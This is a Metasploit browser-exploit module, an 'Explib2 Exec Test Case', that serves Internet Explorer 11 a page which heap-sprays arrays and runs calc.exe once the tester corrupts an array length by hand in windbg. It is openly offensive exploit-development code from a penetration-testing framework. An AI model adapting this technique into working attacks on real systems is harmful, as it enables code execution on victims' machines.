##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Explib2 Exec Test Case",
        'Description' => %q{
          This module allows to test integration of Explib2 into metasploit.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'guhe120', # Original explib2 author
          'juan vazquez'
        ],
        'References' => [
          [ 'URL', 'https://github.com/jvazquez-r7/explib2' ] # The original repo has been deleted
        ],
        'Platform' => 'win',
        'BrowserRequirements' => {
          :source => /script/i,
          :os_name => OperatingSystems::WINDOWS,
          :ua_name => HttpClients::IE,
          :ua_ver => '11.0'
        },
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DisclosureDate' => '2014-03-28',
        'DefaultTarget' => 0
      )
    )
  end

  def exploit_html
    template = %Q|<html>
<head>
  <script>
    <%=js_explib2_payload%>
  </script>
  <script>
    <%=js_explib2%>
  </script>
</head>
<body>
<script>

var num_arrays = 98688;
var arr_size = (0x1000 - 0x20)/4;
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') );
explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
explib.spray();

/*
* Modify array length
* In the real world exp, you  need to modify the array length field with your vulnerability
*/
alert( 'Execute the command in windbg: "ed 1a1b3000+18 400"' );

explib.go();

</script>
</body>
</html>
    |

    return template, binding()
  end

  def on_request_exploit(cli, request, target_info)
    send_exploit_html(cli, exploit_html)
  end

end
